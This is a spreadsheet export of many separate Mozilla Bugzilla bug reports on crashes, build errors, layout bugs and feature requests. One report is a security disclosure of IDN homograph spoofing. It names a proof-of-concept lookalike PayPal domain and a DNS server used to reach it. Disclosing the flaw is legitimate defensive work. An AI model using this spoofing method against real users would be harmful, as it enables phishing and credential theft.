Expected Results:  Mozilla should have displayed all the .jpg and .gif files on 
the websites. Also noticed Mozilla should not have displayed any white as the 
websites are done in almost all Black yet the white shows up.</t>
  </si>
  <si>
    <t>ThomasBuffington</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-506997</t>
  </si>
  <si>
    <t>Widget: OS/2</t>
  </si>
  <si>
    <t>OS/2 linking problem after mDeferredPositioner removal</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (OS/2 U Warp 4.5 en-US rv:1.9.2a1pre) Gecko/20090725 Minefield/3.6a1pre
Build Identifier: 
E:\mozbuild1\staticlib\components\wdgtos2.lib(nsWindow.o) : error LNK2029: nsWindow::DeferPosition(unsigned long unsigned long long long long long unsigned long) : unresolved external
Seems that bug506103 either removed too much or too less
Those files still have references to DeferPosition
http://mxr.mozilla.org/mozilla-central/source/widget/src/os2/nsWindow.h#305
http://mxr.mozilla.org/mozilla-central/source/widget/src/os2/nsWindow.cpp#3355
Reproducible: Always</t>
  </si>
  <si>
    <t>CORE-179810</t>
  </si>
  <si>
    <t>[FIX]nsDOMIterator::MakeList should be removed in favor of AppendList</t>
  </si>
  <si>
    <t>Since it already just calls through to AppendList I see no real reason to keep
MakeList around do you?  Let me know if you do... )</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-235814</t>
  </si>
  <si>
    <t>theinquirer.net - This page can't be viewed because is identified as Binary Executable</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.6) Gecko/20040207 Firefox/0.8
When I go to http://www.theinquirer.net/inquirer.rss
Firefox popup opening dialog telling me that this file is Binary Executable
and the only action is Save to file.
The file inquirer.rss seems to be ok.
Reproducible: Always
Steps to Reproduce:
1. Go to http://www.theinquirer.net/inquirer.rss
2.
3.</t>
  </si>
  <si>
    <t>bela</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-496419</t>
  </si>
  <si>
    <t>Collections</t>
  </si>
  <si>
    <t>Managing permissions from other accounts confusing</t>
  </si>
  <si>
    <t>I created some collections that I wanted to transfer ownership of to my other account. I added the other account as a manager but when I logged into that account I saw the attached screen.
The myself there is still referring to the original owner it seems and my email address was the only one listed.
So in editing permissions myself should always be the currently logged in user and the list of people with permissions should be everyone except myself.</t>
  </si>
  <si>
    <t>bugmail</t>
  </si>
  <si>
    <t>SEAMONKEY-121164</t>
  </si>
  <si>
    <t>Unignored threads never properly returned to All or Unread Threads view</t>
  </si>
  <si>
    <t>In Netscape 4.x ignored threads were tagged with an icon so you could tell they
were ignored - and more importantly you could ignore them a second time to
toggle the flag.  This no longer seems to be the case in Mozilla builds
2002011921 and later (I haven't tried earlier builds to see if it's something
that vanished) on Win32 and Linux platforms.</t>
  </si>
  <si>
    <t>BUGZILLA-140633</t>
  </si>
  <si>
    <t>directory datatemplate created in the bugzilla root directory</t>
  </si>
  <si>
    <t>Under windows 2000 a directory named datatemplate is created by bugzilla.</t>
  </si>
  <si>
    <t>cedric.caron</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-502763</t>
  </si>
  <si>
    <t>try server push-to-try feature not working</t>
  </si>
  <si>
    <t>STR: Create a local patch queue patch then try to use push-to-try. I pasted my command session below showing the error.
host-7-236:debug dmandelin$ hg qa
args-start.diff
args-argsub.diff
args-getelem.diff
args-length.diff
args-cleanup.diff
args-fixctor.diff
args-stack.diff
args-reg-fixes.diff
args-expr-idx.diff
args-argsub2.diff
args-range-const.diff
args-range.diff
args-cleanup2.diff
args-jsval.diff
args-tracer-jsval.diff
args-refactor-fir.diff
args-tcheck.diff
args-cleanup3.diff
host-7-236:debug dmandelin$ hg push -f ssh://hg.mozilla.org/try/
pushing to ssh://hg.mozilla.org/try/
searching for changes
remote: adding changesets
remote: adding manifests
remote: adding file changes
remote: transaction abort!
remote: rollback completed
remote: abort: Permission denied: /repo/hg/mozilla/try/.hg/store/data/content/base/public/ns_content_utils.h.i
abort: unexpected response: empty string</t>
  </si>
  <si>
    <t>dmandelin</t>
  </si>
  <si>
    <t>CORE-469861</t>
  </si>
  <si>
    <t>Crash [@ nsHTMLReflowState::CalculateHypotheticalBox] with MathML position:fixed tables</t>
  </si>
  <si>
    <t>Created attachment 353260
testcase (crashes Firefox when loaded)
###!!! ASSERTION: shouldn't use unconstrained widths anymore: '(mFrameType == NS_CSS_FRAME_TYPE_INLINE &amp;&amp; !frame-&gt;IsFrameOfType(nsIFrame::eReplaced)) || frame-&gt;GetType() == nsGkAtoms::textFrame || mComputedWidth != NS_UNCONSTRAINEDSIZE' file /Users/jruderman/central/layout/generic/nsHTMLReflowState.cpp line 305
###!!! ASSERTION: Should hit cbrs-&gt;frame before we run off the frame tree!: 'aContainingBlock' file /Users/jruderman/central/layout/generic/nsHTMLReflowState.cpp line 1103
Crash:
0  nsIFrame::GetPositionIgnoringScrolling
1  nsHTMLReflowState::CalculateHypotheticalBox
2  nsHTMLReflowState::InitAbsoluteConstraints
...</t>
  </si>
  <si>
    <t>CORE-381130</t>
  </si>
  <si>
    <t>Small changes to line layout for new textframe</t>
  </si>
  <si>
    <t>Created attachment 265212
patch
I have a patch with the following small changes:
1) add nsGkAtoms::tabWidthProperty that new textframe will be using. Trivial.
2) Add nsLineLayout::GetCurrentFrameXDistanceFromBlock. This is needed by the new textframe's tabbing code to figure out where the tab stops are.
3) A bug fix for inline layout. If a text frame doesn't fit on a line but it registers a break opportunity at its end and that's the only break opportunity on the line nsLineLayout::CanPlaceFrame decides that it's OK to push the frame because there is a break opportunity to roll back to ... not realizing that the break opportunity is in the frame not before it so that strategy won't work. The fix is simple tell CanPlaceFrame whether there was a break opportunity before the current frame. The testcase is this:
Trythiswhynot?
The bug caused it to break after the span. I can add a simple reftest to this effect.</t>
  </si>
  <si>
    <t>CORE-288165</t>
  </si>
  <si>
    <t>SVG path: marker-start/-end (auto orient): wrong direction</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050329
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8b2) Gecko/20050329
SVG marker-start and marker-end directions for the path tag are partly
interpolated with a direction before path and a direction after path.
This especially when there are curved path elements in the path (e.g. circle)
(directions for the line tag are as expected - just in the direction of the line)
This is against SVG 1.1 specification (W3C SVG 1.1 specification 11.6.2 b) c)
marker element/orient=auto)
It may also lead to Mozilla crash (see additional information)
Reproducible: Always
Steps to Reproduce:
1.start the appended xml file
2.marker dart should show in the tangent direction
3.
Actual Results:  
direction of marker is interpolated with a direction perhaps before
(marker-start)/after (marker-end) the path.
Expected Results:  
marker start tangentially to the first element in the path
marker end tangentially to the last element
There are cases in which Mozilla SVG is crashing when making this unexpected
interpolation. Last week build 2005031609 was permanently crashing just until I
removed an assignment resulting in a 
   node.setAttribute(d)
(letting the svg:path without d attribute. Comment: path as an empty place
holder for expected lines)
Today I couldn't provoke this reaction not even with the same build and some of
the  original crash provoking pages.</t>
  </si>
  <si>
    <t>kohl</t>
  </si>
  <si>
    <t>CORE-525588</t>
  </si>
  <si>
    <t>Some existing necko tests failing once base class catches handler exceptions</t>
  </si>
  <si>
    <t>The patch for bug 521258 has exposed some errors in the existing necko unit tests.  Some tests which previously passed are now catching errors in one of OnStartRequest OnDataAvailable and/or OnStopRequest.  We should apply the patch for bug 521258 on a test box figure out which tests are failing and fix them before we can land the patch.
Jae-Seong are you interested in working on this?  I'm too busy with electrolysis stuff to do it myself right now.</t>
  </si>
  <si>
    <t>lusian</t>
  </si>
  <si>
    <t>jduell.mcbugs</t>
  </si>
  <si>
    <t>SOCORRO-421940</t>
  </si>
  <si>
    <t>support passing cache path to minidump_stackwalk</t>
  </si>
  <si>
    <t>I landed my minidump_stackwalk symbol cache patch on a Breakpad branch:
http://google-breakpad.googlecode.com/svn/branches/processor-symbol-cache/
We should switch to using this in production. It's got unit tests so I'm confident in the correctness. mento just hasn't had a chance to review it so it hasn't landed in trunk yet. There may still be room for improvement in the code I don't know.
Anyway this adds a -c commandline option to minidump_stackwalk which lets you specify the cache path. We should expose this through a config setting in the processor.</t>
  </si>
  <si>
    <t>SEAMONKEY-63618</t>
  </si>
  <si>
    <t>[RFE] Make Mozilla a better mushroom soup</t>
  </si>
  <si>
    <t>Please.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-213825</t>
  </si>
  <si>
    <t>[FIX]attempts to download balances.dll file on logout of site</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5a) Gecko/20030718
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.5a) Gecko/20030718
Logging out of www.scottsave.com brings up download manager wanting to download
balances.dll file during redirect to www.scottrade.com
Reproducible: Always
Steps to Reproduce:
1.log in to www.scottsave.com
2.click log out link
3.
Actual Results:  
Download manager popped up with The file Balances.dll is of type
application/x-msdownload and Mozilla does not know how to handle this file
type.  This file is located at: https://www1.scottsave.com/Scripts/
What should Mozilla do with this file?
Expected Results:  
no download manager asking to download file from server.  This did not occur in
version 1.3.1 but can be reproduced in version 1.4 as well.</t>
  </si>
  <si>
    <t>ielasi</t>
  </si>
  <si>
    <t>MOZILLA_LABS_GRAVEYARD-510308</t>
  </si>
  <si>
    <t>On main page link to old version of TP (0.1.0)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 6.1 ru rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 4.0.20506)
Build Identifier: Mozilla/5.0 (Windows U Windows NT 6.1 ru rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 4.0.20506)
After downloading Test Pilot version 0.1.0 it want to update to version 0.1.1. But there is link on 0.1.0 version on main page.
Reproducible: Always
Steps to Reproduce:
1. Follow Test Pilot main page
2. Download TP
3. Install TP
4. Restrat FF
5. Get update message from TP
Actual Results:  
Old version on main page.
Expected Results:  
Latest version on main page.</t>
  </si>
  <si>
    <t>avg00r</t>
  </si>
  <si>
    <t>WEBSITES-380588</t>
  </si>
  <si>
    <t>add john lilly's mozilla feed to planet</t>
  </si>
  <si>
    <t>hiya --
i'd like to add the posts from my personal blog which are tagged mozilla to planet -- they're here: http://john.jubjubs.net/category/mozilla/
not sure the best way to introduce me except maybe to say that i've been at moz for a couple of years am involved with other OSS projects like the Participatory Culture Foundation and OSAF am COO by title but spend a lot of time working on how to grow in other countries like China &amp; Japan and how to be ever more leveraged as we grow.</t>
  </si>
  <si>
    <t>lilly</t>
  </si>
  <si>
    <t>FIREFOX-253161</t>
  </si>
  <si>
    <t>bookmarks favicons should follow redirects</t>
  </si>
  <si>
    <t>The FaviconLoadListener doesn't implement nsIHttpEventSink and so redirects for
favicons aren't being followed leading to some sites not getting a favicon loaded.</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-328215</t>
  </si>
  <si>
    <t>Litmus</t>
  </si>
  <si>
    <t>Litmus testcase  don't display correctly with mac trunk builds</t>
  </si>
  <si>
    <t>I have not yet seen this for myself but Tracy and other have reported that Litmus is unusable on recent Trunk builds and on Safari i.e. there is no display.
Tracy: can you add more details and set affected platforms if applicable.</t>
  </si>
  <si>
    <t>litmus</t>
  </si>
  <si>
    <t>CORE-514585</t>
  </si>
  <si>
    <t>ES5 strict mode: recognize use strict directives in Directive Prologue</t>
  </si>
  <si>
    <t>The parser should recognize ES5 Directive Prologues when they appear at the top of global code eval code or a function body recognize a Use Strict Directive within such a prologue and set an appropriate flag in the JSTreeContext structure that enables the errors required for strict mode.</t>
  </si>
  <si>
    <t>CORE-514351</t>
  </si>
  <si>
    <t>support HandheldFriendly meta tag</t>
  </si>
  <si>
    <t>When a page specifies this we shouldn't scale the page just fit to actual screen width.</t>
  </si>
  <si>
    <t>CORE-279099</t>
  </si>
  <si>
    <t>Protect against homograph attacks (spoofing using punycode IDNs)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.7.3) Gecko/20040913 Firefox/0.10
firefox (and other unamed browsers) incorrectly handles punycode encoded domain
names.   This allows attackers (namely phishers) to spoof urls of just about any
domain name including ssl certs. 
Proof of concept url:
http://www.shmoo.com/testing_punycode/
The links are directed at http://www.pypal.com/ which the punycode
handlers render as www.xn--pypal-4ve.com
The domain was just registered so the root servers may not have gotten it yet.
 Point your dns servers at '216.254.21.212' if you have problems. 
Here's what I think the bug is:
1.  firefox (and mozilla) should warn the user if punycode is in use at all
2.  You should consider validating the ssl cert with the non-decoded version of
the website
Just in case it's not clear an attack case could be an ebayer/phisher who
includes links to paypal in their auction. When the auction ends the buyer
clicks on the paypal link (which is a punycode/proxy to the real paypal) and
proceeds to steal all of their private green bits. 
I have not done any platform testing or tested any other versions of
mozilla/firefox/etc.  I assume this bug is cross-platform.
The proof of concept urls are hosted on a personal server and as such I'd like
to have a chance to bring them down before this bug becomes public.  Please
email me at ericj@shmoo.com before marking this bug public.  
/me goes and reads up on the mozilla bounty program. 
Reproducible: Always</t>
  </si>
  <si>
    <t>ericj</t>
  </si>
  <si>
    <t>ENTERPRISE_INFORMATION_SECURITY-803307</t>
  </si>
  <si>
    <t>ENTERPRISE_INFORMATION_SECURITY</t>
  </si>
  <si>
    <t>Tracking bug: pip fixes for marketplace</t>
  </si>
  <si>
    <t>Tracking bug for pip fixes</t>
  </si>
  <si>
    <t>gdestuynder</t>
  </si>
  <si>
    <t>FIREFOX-370329</t>
  </si>
  <si>
    <t>Many single transactions still trigger batch mode</t>
  </si>
  <si>
    <t>Created attachment 255029
patch
Executing many single deletes/adds for bookmarks still triggers batch mode.  This gets in the way of incremental drawing for result-views (because in batch mode we ignore all changes and just rebuild the view when the batch is done.)
The old bookmarks code did something similar with http://lxr.mozilla.org/seamonkey/source/browser/components/bookmarks/content/bookmarks.js#46
Patch for using this strategy in Places is attached.</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID-971751</t>
  </si>
  <si>
    <t>FIREFOX_FOR_ANDROID</t>
  </si>
  <si>
    <t>Investigate removing the Java URL prefetch code from startup</t>
  </si>
  <si>
    <t>The java prefetch code was originally landed to power up the radio and warm DNS. We added a Gecko speculative connection in bug 966573 that does the same thing but is also a networking connection that Gecko will reuse.
The speculative connection happens in the BrowserCLH which is ~1.5secs before we actually try to use the URL. The java prefetch happens a little sooner than the Gecko speculative connection and that might mean we get a little better headstart in powering the radio and DNS.
That said having two pieces of code that do the same type of thing is redundant especially during startup. Given that Gecko can actually re-use the speculative connection we would remove the java prefetch.
If the java prefetch has no measureable advantage we should remove it. We need to do some testing using cold powered down cell radios. Launch fennec with an intent to load a URL externally. Measure how long it takes to get to throbber stop. With and without the prefetch.</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-273789</t>
  </si>
  <si>
    <t>retire nsenterprise</t>
  </si>
  <si>
    <t>nsenterprise
This indicates a bug nominated as a blocker for Enterprise use. Enterprise use
means the ability for large organizations (500+ users) to deploy the product for
daily end-user use. This keyword will be changed to nsenterprise+ or the
nsenterprise- keyword to indicate Netscape Enterprise Client Team (ECT)
approval/rejection of higher prioritization of this bug.
at the time of its retirement the 313 keyworded bugs were:
11057162411925819271236793038731881343243864338954404804172041805448014493744938456994649046845491805082351068527465308053707547085530956612585735903559313597586129063819653606558365704658176583566372670556821569580703487053870623720517334373610736387517775208754077559475666759067614576234765597664976915774557749277685778377803078119781767819578204783977861578719788027880378813789317893279146791537980579822801058036380446804698104881257813178139981476814788168281958822718234082401824188274482799828928289982966829928316283165831778320683239832648353583581835858368283747837588381083906839958412884151841638421184212842188433684376843778443684499845118454484731848258493385225852288523685259853078533585451854828550485535856328568885695857078572085809859318593285934862938641386460865488664786860871348720387262873618751687625876408765487838878968807988142882308826888381884278854788552886148908689104892748942089650899318999590093901459050990639906419098790989910219108791121912979132591366916839168491732918489197891982919859198691995920119212392213922959235892502928289283192833928539302793091931169317393351934489345693503935889392493939940069417194488944999451794579949789511195124953289533495418954419546995578956839571295727957959598796024960539615296160962329623896393964189656096646966519691096936970679724797452975429770397829978309831698796100065100341100353100645101076101086101140101953102673102932103181105335110832112555114097115035116042121415122377125561126239128386129740130041130223132076132640132874133638136908139258139769142196149049159424160261162025162223192780222757224482247524</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-107640</t>
  </si>
  <si>
    <t>table layout incorrect compared to IE/NS</t>
  </si>
  <si>
    <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.9.5+)
Gecko/20011030
BuildID:    20011030
Go to the URL and scroll down you'll see a large
blank area in the middle of the HTML page.  When
using IE you can see the contents fit to each
other snuggishly.  (the page is in chinese text
but that's not an issue or cause).
Reproducible: Always
Steps to Reproduce:
1.open mozilla browser
2.type in http://www.sina.com.cn and return
3.ignore the strange characters (Chinese) scroll down
  a little and you can see a large blank area.
Actual Results:  A large blank area in the middle of the whole page
Expected Results:  all contents should fix together snuggishly.
This is the third time I report mozilla problem related
to table rendering.  The previous two have already been
identified and fixed.  I suggest doing a code review of
that portion to see why it is so error prone.</t>
  </si>
  <si>
    <t>jiang_wq</t>
  </si>
  <si>
    <t>CORE-529269</t>
  </si>
  <si>
    <t>crash in [@ XPCWrapper::NativeToString]</t>
  </si>
  <si>
    <t>I've hit a crash triggered by DOM inspector's javascript object view:
Open the options window in namoroka then select the prefwindow element javascript object. Expand boxObject firstChild element parentNode.
Crash stacks in http://crash-stats.mozilla.com/report/index/bp-015fbe1f-6f97-48b2-9bc0-987b62091117 http://crash-stats.mozilla.com/report/index/560525a8-d9fb-4a7b-9a5e-5f5422091117</t>
  </si>
  <si>
    <t>CORE-513263</t>
  </si>
  <si>
    <t>TM: removed unused hasLoop flag [nanojit]</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-143578</t>
  </si>
  <si>
    <t>Tinderbox2</t>
  </si>
  <si>
    <t>Cross-browser panels to TinderBox2.</t>
  </si>
  <si>
    <t>I will attach the dhtml code for my implementation of panels popup.</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-254706</t>
  </si>
  <si>
    <t>Bad: not able to setup any RSS feeds</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7) Gecko/20040626 Firefox/0.9.1
Installed latest nightly build after un-install 0.7.3.  After installing build
(with EXE) then I started TB clicked on Tools --&gt; Account Settings --&gt; Add
Account --&gt; RSS News &amp; Blogs Account --&gt; Next --&gt; Blogs --&gt; Next --&gt; Finish. 
I then selected the new Blogs account I setup and clicked on Manage
Subscriptions and I receive the error:
XML Paring Error: xml processing instruction not at start of external entity
Location: chrome://messenger-newsblog/content/subscriptions.xul
Line Number 1 Column 1:
Reproducible: Always
Steps to Reproduce:
1. Tools
2. Account Settings
3. Add Account
4. RSS News &amp; Blogs Account
5. Next 
6. Type Blogs
7. Next 
8. Finish
9. Select Blogs account
10. click Manage Subscriptions
Actual Results:  
I receive the error:
XML Paring Error: xml processing instruction not at start of external entity
Location: chrome://messenger-newsblog/content/subscriptions.xul
Line Number 1 Column 1:
Expected Results:  
Somehow to seutp a RSS feed.</t>
  </si>
  <si>
    <t>murrayt5</t>
  </si>
  <si>
    <t>CORE-448168</t>
  </si>
  <si>
    <t>Apply |s/entires/entries/g|</t>
  </si>
  <si>
    <t>rsesek</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-297131</t>
  </si>
  <si>
    <t>LDAP Integration</t>
  </si>
  <si>
    <t>basic support for LDAP v3 controls</t>
  </si>
  <si>
    <t>A Thunderbird extension I'm working on wants a way to send an LDAP v3 control
with addressbook and autocomplete searches.</t>
  </si>
  <si>
    <t>CORE-417941</t>
  </si>
  <si>
    <t>regexp:match function use gives error</t>
  </si>
  <si>
    <t>The test case  is a dummy XML file using the XSLT stylesheet  to test the EXSLT regexp:match function.
With the latest Firefox trunk nightly (Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9b4pre) Gecko/2008021504 Minefield/3.0b4pre) the page displays
Error during XSLT transformation: An unknown error has occurred (80570021)
and the error console has the following error message:
Error: doc is null
Source File: file:///C:/Programme/Mozilla%20Firefox/nightlies/ff304b20080215/firefox/components/txEXSLTRegExFunctions.js
Line: 75
Line 75 in that JavaScript file is
  var doc = context.contextNode.ownerDocument</t>
  </si>
  <si>
    <t>peterv</t>
  </si>
  <si>
    <t>martin.honnen</t>
  </si>
  <si>
    <t>BUGZILLA-238628</t>
  </si>
  <si>
    <t>Databasechart in Bugzilla guide (PDF-version) gets truncated</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.6) Gecko/20040206 Firefox/0.8
The database chart i Bugzilla-guide.pdf  version 2.16.4 gets truncated right and
bottom.
And it dows seem to be missing in 2.17.7 which is a pity.
Reproducible: Always
Steps to Reproduce:
1. Take up the documentation in Adobe Acrobat.
2. Go down to the database chart 
3.
Actual Results:  
Truncated map of the database
Expected Results:  
A complete map of the database</t>
  </si>
  <si>
    <t>ola.engstrom</t>
  </si>
  <si>
    <t>CORE-447764</t>
  </si>
  <si>
    <t>Investigate if event listeners aren't kept alive long enough</t>
  </si>
  <si>
    <t>Bug 333078 changed event listener manager a bit and removed one nsRefPtr which
looks pretty important to me.
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=mozilla/content/events/src&amp;command=DIFF_FRAMESET&amp;file=nsEventListenerManager.cpp&amp;rev2=1.253&amp;rev1=1.252
If event is dispatched via DispatchToInterface the listener is kept alive because of the addrefing QueryInterface. However to usual case is to use 
HandleEventSubType and there addrefing doesn't happen.
Any idea why bug 333078 removed:
nsRefPtr listener = ls-&gt;mListener.Get() ?</t>
  </si>
  <si>
    <t>BUGZILLA-525617</t>
  </si>
  <si>
    <t>Template Hook for bug/field.html.tmpl</t>
  </si>
  <si>
    <t>Created attachment 409484
v1
Here's a template hook for the field-containing column in bug/field.html.tmpl.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-207698</t>
  </si>
  <si>
    <t>captureuser.com - Cannot enter data via text form input seems to be ignored</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3.1) Gecko/20030425
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.3.1) Gecko/20030425
From the page http://www.nikonusa.com/captureuser/content.jsp 
I tried to enroll as an Online Magazine user. Ufortunately
This does not work with Mozilla I used MS explorer. 
Reproducible: Always
Steps to Reproduce:
1.Goto http://www.nikonusa.com/captureuser/content.jsp
2.Enter name email address click on enter
3.
Actual Results:  
Nothing happens. Entered data vanishes on the JavaScript console 
appears an error message: 
  Error: event is not defined
  Source File: http://www.nikonusa.com/js/rollovers.js
  Line: 83
Expected Results:  
Entered the data and advaced to next web page.</t>
  </si>
  <si>
    <t>herter</t>
  </si>
  <si>
    <t>CORE-337723</t>
  </si>
  <si>
    <t>Use of non-scriptable interfaces in scriptable interfaces</t>
  </si>
  <si>
    <t>While trying to use xpidl for generating Java interfaces for JavaXPCOM I ran into issues where scriptable interfaces inherit from or use non-scriptable interfaces.  For JavaXPCOM I only expose scriptable interfaces (exceptions made for nsIAppShell).  But this makes it very hard when using xpidl since it doesn't always know whether a given interface is scriptable.
For now I get around this by generating the Java interfaces with a utility based around nsIInterfaceInfoManager which has all the information to determine how to write out all interfaces.  But using xpidl would be more ideal (bug 333618) so it would be good to fix these interfaces.
Here is the current list of grievances:
* imgIDecoderObserver inherits from non-scriptable imgIContainerObserver.
* nsIScriptSecurityManager inherits from non-scriptable nsIXPCSecurityManager.
* nsIWindowCreator2 inherits from non-scriptable nsIWindowCreator.
* An nsIJMVManager method returns non-scriptable nsIPrincipal.
* An nsISocketProviderService method returns non-scriptable nsISocketProvider.
* An nsIWSPInterfaceInfoService method uses non-scriptable nsIInterfaceInfoManager and nsIInterfaceInfo.
There may be more but that's what I have for now.</t>
  </si>
  <si>
    <t>jhpedemonte</t>
  </si>
  <si>
    <t>TOOLKIT-470439</t>
  </si>
  <si>
    <t>Migration from signons.txt loses newsgroup username/password information.</t>
  </si>
  <si>
    <t>Due to the way that MailNews stores newsgroup logins in signons.txt we need to keep the path information.
Currently mailnews stores:
news://localhost/#password
news://localhost/#username
Although these aren't ideal until we do a further uplift in mailnews to fix what we do I'm not going to change them. In any case - when we upgrade they currently come out as:
news://localhost/
hence we don't have enough info.
I have a patch for this just need to extend the unit tests.</t>
  </si>
  <si>
    <t>FIREFOX-317633</t>
  </si>
  <si>
    <t>Undo/Redo for Places</t>
  </si>
  <si>
    <t>Bring across transaction management from the old Bookmarks system.</t>
  </si>
  <si>
    <t>CORE-121643</t>
  </si>
  <si>
    <t>SOAP is not correctly identifying complex types with simple content</t>
  </si>
  <si>
    <t>The checks within the product need to all check the content model of a complex
type and if it is simple treat it as simple.  No tests yet for this.</t>
  </si>
  <si>
    <t>rayw</t>
  </si>
  <si>
    <t>DEVELOPER.MOZILLA.ORG-865863</t>
  </si>
  <si>
    <t>Remove compatibility table related CSS from Kuma CSS files</t>
  </si>
  <si>
    <t>What feature should be changed? Please provide the URL of the feature if possible.
==================================================================================
We duplicate this CSS in Template:CustomCSS because we've made gradual changes since Kuma's launch.
Remove all CSS for the class htab as well as the table.compat-table entries.
What problems would this solve?
===============================
Let's remove these from the Kuma-internal CSS to avoid unnecessary duplication.
Who would use this?
===================
n/a
What would users see?
=====================
n/a
What would users do? What would happen as a result?
===================================================
n/a
Is there anything else we should know?
======================================</t>
  </si>
  <si>
    <t>CORE-25427</t>
  </si>
  <si>
    <t>feature request: intellimouse wheel + ctrl key = font resize</t>
  </si>
  <si>
    <t>This feature is in MSIE 5.0.  It's very handy because many pages have the
wrong font size (too big or too small).  I'd like to see it in Mozilla/5.0.</t>
  </si>
  <si>
    <t>jtr</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-155484</t>
  </si>
  <si>
    <t>Edit menu should apply to bookmarks</t>
  </si>
  <si>
    <t>I should be able to use Cut/Copy/Paste/Delete for bookmarks in the sidebar.</t>
  </si>
  <si>
    <t>FIREFOX-240136</t>
  </si>
  <si>
    <t>Migration</t>
  </si>
  <si>
    <t>Firefox should not auto-import settings without user confirmation</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win98 en-US rv:1.7b) Gecko/20040409 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Win98 en-US rv:1.7b) Gecko/20040409 Firefox/0.8.0+
i've seen cases where MSIE can get very damaged by web-related exploit content
and this often makes web surfing on that system very difficult if not impossible.
if firefox is to have the option of importing 'user settings and other
information' from MSIE or other browsers it would be VERY good if it asked
first. in my experience so far in many cases i have wanted firefox to be
completely ignorant of whatever settings MSIE currently has.
Reproducible: Always
Steps to Reproduce:
1. install fresh copy of firefox 0.8.0+ (2004-04-09) onto system with MSIE installed
2. run mozilla firefox the first time it will import settings from MSIE without
prompting first.
Expected Results:  
prompt yes/no for importing previous browser settings</t>
  </si>
  <si>
    <t>CORE-281241</t>
  </si>
  <si>
    <t>dynamical inserted/appended columns need to replace span defined anonymous columns</t>
  </si>
  <si>
    <t>THUNDERBIRD-462578</t>
  </si>
  <si>
    <t>Implement Quick Search option Subject Sender or Recipient (Subject From To CC or BCC) to allow filtering for full conversations with a contact easily</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.1b1pre) Gecko/20081006 Shredder/3.0a3
A lot of people are keeping copies of their sent messages in their inbox folder or any other folder so as to have full conversations / message threads in one folder. Which is also a common practice for some well-known webmail applications. Therefore it would be highly beneficial to be able to search for both sender and recipient simultaneously using quicksearch. Right now believe it or not in the year 2008 there is no option in quicksearch that allows returning complete communication with (i.e. from and to) one person/contact. And since we all love comfort and Subject From has been there for a reason I think Subject From To or CC should be the new option. Which will spare me from changing my quicksearch options each time I am looking for a subject rather than a person's communication and vice versa. I don't mind having To or CC or From in addition but some people might think it makes the list too long.
A more friendly title for the requested new option might be
Subject Sender or Recipient or even just
Subject Person
Reproducible: Always
Steps to Reproduce:
1. Your inbox folder holds copies of sent messages you are searching for all mails to and from a certain person (complete communication with that contact)
2. Look at quick search options to accomplish your search
3.
Actual Results:  
Be shocked that it is not possible to search for full communications (From and to)
Expected Results:  
Find a default quicksearch option in the quicksearch dropdown:
Subject From To or CC
or perhaps friendlier to read:
Subject Sender or Recipient or Subject Person
Thinking about it in terms of the length of the options list would it do much harm to *replace* Subject or From with Subject From To or CC?</t>
  </si>
  <si>
    <t>bugzilla2007</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-494915</t>
  </si>
  <si>
    <t>Servicedesk</t>
  </si>
  <si>
    <t>Need extension for new Toronto polycom</t>
  </si>
  <si>
    <t>MAC Address: 00:04:f2:e6:0d:47
This will be the primary conference phone for the toronto office.  I believe our others are 513 514 and 515.  It would be nice if this one was memorable but I imagine we'll learn it whatever it is.  I suppose 555 isn't available eh?</t>
